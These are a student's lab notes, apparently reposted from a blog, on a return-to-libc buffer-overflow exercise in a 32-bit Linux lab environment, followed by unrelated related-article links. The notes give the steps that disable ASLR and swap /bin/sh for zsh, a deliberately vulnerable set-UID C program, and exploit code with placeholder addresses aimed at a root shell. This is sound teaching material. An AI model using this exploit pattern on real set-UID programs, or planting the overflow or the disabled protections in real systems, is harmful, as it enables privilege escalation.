• 20179223《Linux内核原理与分析》第十二周学习笔记


    Return-to-libc 攻击实验

    一、实验描述

        缓冲区溢出的常用攻击方法是用 shellcode 的地址来覆盖漏洞程序的返回地址,使得漏洞程序去执行存放在栈中 shellcode。为了阻止这种类型的攻击,一些操作系统使得系统管理员具有使栈不可执行的能力。这样的话,一旦程序执行存放在栈中的 shellcode 就会崩溃,从而阻止了攻击。
    
       不幸的是上面的保护方式并不是完全有效的,现在存在一种缓冲区溢出的变体攻击,叫做 return-to-libc 攻击。这种攻击不需要一个栈可以执行,甚至不需要一个 shellcode。取而代之的是我们让漏洞程序跳转到现存的代码(比如已经载入内存的 libc 库中的 system()函数等)来实现我们的攻击。
    

    二、实验准备

    系统用户名 shiyanlou

    实验楼提供的是 64 位 Ubuntu linux,而本次实验为了方便观察汇编语句,我们需要在 32 位环境下作操作,因此实验之前需要做一些准备。

    1、输入命令安装一些用于编译 32 位 C 程序的东西:

    sudo apt-get update
    
    sudo apt-get install lib32z1 libc6-dev-i386
    
    sudo apt-get install lib32readline-gplv2-dev
    

    2、输入命令“linux32”进入 32 位 linux 环境。输入“/bin/bash”使用 bash:

    三、实验步骤

    3.1 初始设置

    Ubuntu 和其他一些 Linux 系统中,使用地址空间随机化来随机堆(heap)和栈(stack)的初始地址,这使得猜测准确的内存地址变得十分困难,而猜测内存地址是缓冲区溢出攻击的关键。因此本次实验中,我们使用以下命令关闭这一功能:

    sudo sysctl -w kernel.randomize_va_space=0
    

    此外,为了进一步防范缓冲区溢出攻击及其它利用 shell 程序的攻击,许多 shell 程序在被调用时自动放弃它们的特权。因此,即使你能欺骗一个 Set-UID 程序调用一个 shell,也不能在这个 shell 中保持 root 权限,这个防护措施在/bin/bash 中实现。

    linux 系统中,/bin/sh 实际是指向/bin/bash 或/bin/dash 的一个符号链接。为了重现这一防护措施被实现之前的情形,我们使用另一个 shell 程序(zsh)代替/bin/bash。下面的指令描述了如何设置 zsh 程序:

    sudo su
    
    cd /bin
    
    rm sh
    
    ln -s zsh sh
    
    exit
    

    为了防止缓冲区溢出攻击,最近版本的 gcc 编译器默认将程序编译设置为栈不可执行,而你可以在编译的时候手动设置是否使栈不可执行:

    gcc -z execstack -o test test.c    #栈可执行
    
    gcc -z noexecstack -o test test.c  #栈不可执行
    

    本次实验的目的,就是展示这个“栈不可执行”的保护措施并不是完全有效,所以我们使用“-z noexecstack”,或者不手动指定而使用编译器的默认设置。

    3.2 漏洞程序

    把以下代码保存为“retlib.c”文件,保存到 /tmp 目录下。代码如下:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    int bof(FILE *badfile)
    {
    char buffer[12];
    
    fread(buffer, sizeof(char), 40, badfile);
    return 1;
    }
    int main(int argc, char **argv)
    {
    FILE *badfile;
    badfile = fopen("badfile", "r");
    bof(badfile);
    printf("Returned Properly
    ");
    fclose(badfile);
    return 1;
    }
    

    然后使用gcc -m32 -g -fno-stack-protector -o retlib retlib.c,默认使用“栈不可执行”保护。

    GCC 编译器有一种栈保护机制来阻止缓冲区溢出,所以我们在编译代码时需要用 –fno-stack-protector 关闭这种机制。

    上述程序有一个缓冲区溢出漏洞,它先从一个叫“badfile”的文件里把 40 字节的数据读取到 12 字节的 buffer,引起溢出。fread()函数不检查边界所以会发生溢出。由于此程序为 SET-ROOT-UID 程序,如果一个普通用户利用了此缓冲区溢出漏洞,他有可能获得 root shell。应该注意到此程序是从一个叫做“badfile”的文件获得输入的,这个文件受用户控制。现在我们的目标是为“badfile”创建内容,这样当这段漏洞程序将此内容复制进它的缓冲区,便产生了一个 root shell 。

    我们还需要用到一个读取环境变量的程序:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    int main(int argc, char const *argv[])
    {
     char *ptr;
    
     if(argc < 3){
        printf("Usage: %s <environment var> <target program name>
    ", argv[0]);
        exit(0);
        }
     ptr = getenv(argv[1]);
     ptr += (strlen(argv[0]) - strlen(argv[2])) * 2;
     printf("%s will be at %p
    ", argv[1], ptr);
     return 0;
    }
    

    编译一下:

    gcc -m32 -o getenvaddr getenvaddr.c
    

    3.3 攻击程序

    把以下代码保存为“exploit.c”文件,保存到 /tmp 目录下。代码如下:

    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    int main(int argc, char **argv)
    {
     char buf[40];
     FILE *badfile;
     badfile = fopen(".//badfile", "w");
    
     strcpy(buf, "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90");// nop 24 times
    
     *(long *) &buf[32] =0x11111111; 
     *(long *) &buf[24] =0x22222222; 
     *(long *) &buf[36] =0x33333333; 
     fwrite(buf, sizeof(buf), 1, badfile);
     fclose(badfile);
    }
    

    代码中“0x11111111”、“0x22222222”、“0x33333333”分别是 BIN_SH、system、exit 的地址,需要我们接下来获取

    3.4 获取内存地址

    1、用刚才的 getenvaddr 程序获得 BIN_SH 地址:

    2、gdb 获得 system 和 exit 地址:

    修改 exploit.c 文件,填上刚才找到的内存地址:

    删除刚才调试编译的 exploit 程序和 badfile 文件,重新编译修改后的 exploit.c:

    rm exploitrm badfilegcc -m32 -o exploit exploit.c
    

    3.5 攻击

    先运行攻击程序 exploit,再运行漏洞程序 retlib,可见攻击成功,获得了 root 权限:

  • 相关阅读:
    Mac OS X 10.10(yosemite)更新后,cocoapods出错, 及cocoapods更新至0.34后, 错误情况整理
    如何删除已上线的IAP项
    Automator一键生成所需的iOS 图片icon
    django-simple-captcha 组件使用
    git 本地推送远程仓库报错: error: failed to push some refs to 'https://github.com/yangtuothink/mxonline.git'
    git 提交报错 : The file will have its original line endings in your working directory.
    Django 静态文件相关设置
    Xadmin 组件基础使用以及全局配置
    安装 xadmin 报错: Command "python setup.py egg_info" failed with error code 1 in C:UsersPythonAppDataLocalTemppip-install-1k1byg0pxadmin
    IntegrityError at /admin/users/userprofile/add/ (1452, 'Cannot add or update a child row: a foreign key constraint fails (`mxonline`.`django_admin_log`, CONSTRAINT `django_admin_log_user_id_c564eba6_
  • 原文地址:https://www.cnblogs.com/9223lx/p/8043323.html
Copyright © 2020-2023  润新知